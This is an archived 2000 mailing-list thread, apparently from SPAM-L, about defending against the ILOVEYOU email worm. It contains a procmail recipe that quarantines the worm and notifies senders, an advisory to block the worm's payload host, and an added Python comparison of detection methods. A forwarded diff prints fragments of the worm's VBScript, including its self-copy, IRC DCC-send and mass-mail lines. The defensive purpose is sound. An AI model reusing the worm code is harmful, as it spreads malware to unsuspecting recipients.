Procmail recipe now sends an autoack to the sender
Also, the worm downloads a payload from www.skyinet.net [206.101.197.226].
Block port 80 for this IP at your border or firewall.
BTW, the virus has morphed a bit, and a diff of the old and new versions is
below. This recipe is for the old version.
Suresh Ramasubramanian [EMAIL PROTECTED]
# Catch ILOVEYOU email worm and notify sender his computer is infected
# (procmail regexps have no \s class; "\s" would match a literal "s",
# so the space after the header colon is matched literally)
:0 D
* ^Subject: +ILOVEYOU$
* ^Content-Type: +multipart/mixed
{
    # EMail notice to infected sender (B = match in body, c = work on a copy)
    :0 B c
    * name=\"LOVE-LETTER-FOR-YOU.TXT.vbs\"
    | (formail -r -A"X-Mailer: procmail"; \
       cat /home/sysadmin/mail/ILOVEYOU.txt) \
      | $SENDMAIL -oi -t -f [EMAIL PROTECTED]

    # Safely stash email worm away
    :0 B
    * name=\"LOVE-LETTER-FOR-YOU.TXT.vbs\"
    /home/sysadmin/mail/I-LOVE-YOU.worm
}
content of I-LOVE-YOU.worm file -
To Whom It May Concern,

An e-mail you sent to a customer of YOUR-COMPANY-NAME-HERE triggered this
virus protection filter on our mail server. There is currently a virus on
the Internet that propagates itself via e-mail. Unfortunately, it appears
that your computer has become infected and is currently e-mailing the
virus to other users in an attempt to infect other computer systems.

Please visit http://www.mcafee.com and download the latest McAfee Virus
Scan software along with the latest DAT files to fix this problem. A free
demo version of the software is available from McAfee.

Additional information on this virus can be found at:
http://news.bbc.co.uk/hi/english/uk/newsid_736000/736080.stm

Sincerely,
YOUR NAME OR COMPANY HERE
hth
-s
--
Suresh Ramasubramanian + President, CAUCE India
http://india.cauce.org + [EMAIL PROTECTED]
--
Even bytes get lonely for a little bit.
>From [EMAIL PROTECTED] Fri May 5 10:53:51 2000
Date: Thu, 4 May 2000 23:23:31 -0400 (EDT)
From: Smeagol Gollum <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: SPAM-L archives -- May 2000, week 1 (#197)
---------- Forwarded message ----------
Date: Thu, 4 May 2000 15:41:09 -0700
From: Andrew Edelstein <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: IL0VEY0U has mutated
On Thu, May 04, 2000 at 03:26:05PM -0700, Andrew Edelstein wrote:
> Heads up: our worm of the day has mutated into a new version:
> Same trojan, only now the subject says "fwd: Joke" and the body is empty. The
> attached file is named "Very Funny.vbs"
Thought I'd share the love <eg>, since I've already had a couple of people
ask me for it. Here's a diff of the attached file:
bash-2.03$ diff LOVE-LETTER-FOR-YOU.TXT.vbs Very\ Funny.vbs
25c25
< c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
---
> c.Copy(dirsystem&"\Very Funny.vbs")
118c118
< scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
---
> scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\Very Funny.HTM"
185,187c185,187
< male.Subject = "ILOVEYOU"
< male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
< male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
---
> male.Subject = "fwd: Joke"
> male.Body = vbcrlf&""
> male.Attachments.Add(dirsystem&"\Very Funny.vbs")
266c266
< set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
---
> set b=fso.CreateTextFile(dirsystem+"\Very Funny.HTM")
268c268
< set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
---
> set d=fso.OpenTextFile(dirsystem+"\Very Funny.HTM",2)
274c274
< end sub
\ No newline at end of file
---
> end sub
And their cksums:
1912960623 10034 LOVE-LETTER-FOR-YOU.TXT.vbs
1550212417 9931 Very Funny.vbs
--
Andrew Edelstein http://andrew.pure-chaos.com
"I'm getting off right now!"
Sarah, 07/24/1999
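
Added example, not part of either message above: the recipe keys on the exact subject and attachment name of the first version, and the diff shows the second version changes both. This Python example compares that exact-match test with a check on the attachment's final extension; the sample messages, addresses, function names and the extension list are constructed for illustration.

```python
import email
import os
from email.message import EmailMessage

# Script types Windows runs on double-click (assumed list, not from the page).
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}

def attachment_names(raw):
    """Filenames of all MIME parts (Content-Disposition filename, else Content-Type name)."""
    msg = email.message_from_bytes(raw)
    return [p.get_filename() for p in msg.walk() if p.get_filename()]

def old_signature_matches(raw):
    """Same test as the recipe in this thread: exact subject plus exact attachment name."""
    msg = email.message_from_bytes(raw)
    return (msg.get("Subject", "") == "ILOVEYOU"
            and msg.get_content_type() == "multipart/mixed"
            and "LOVE-LETTER-FOR-YOU.TXT.vbs" in attachment_names(raw))

def script_attachments(raw):
    """Attachments whose final extension is a script type, whatever the subject says."""
    return [n for n in attachment_names(raw)
            if os.path.splitext(n.strip().lower())[1] in SCRIPT_EXTS]

def build_sample(subject, body, filename):
    """Constructed test message; the attachment is inert placeholder bytes."""
    m = EmailMessage()
    m["From"] = "sender@example.com"
    m["To"] = "rcpt@example.com"
    m["Subject"] = subject
    m.set_content(body)
    m.add_attachment(b"placeholder", maintype="application",
                     subtype="octet-stream", filename=filename)
    return m.as_bytes()

# Constructed samples using the subjects and filenames quoted in the thread.
OLD = build_sample("ILOVEYOU", "kindly check the attached LOVELETTER coming from me.\n",
                   "LOVE-LETTER-FOR-YOU.TXT.vbs")
NEW = build_sample("fwd: Joke", "\n", "Very Funny.vbs")
BENIGN = build_sample("minutes", "see attached\n", "minutes.txt")

if __name__ == "__main__":
    for label, raw in (("old", OLD), ("new", NEW), ("benign", BENIGN)):
        print(label, old_signature_matches(raw), script_attachments(raw))
```

The extension check looks only at the last suffix, so the double extension in "LOVE-LETTER-FOR-YOU.TXT.vbs" is still flagged as .vbs.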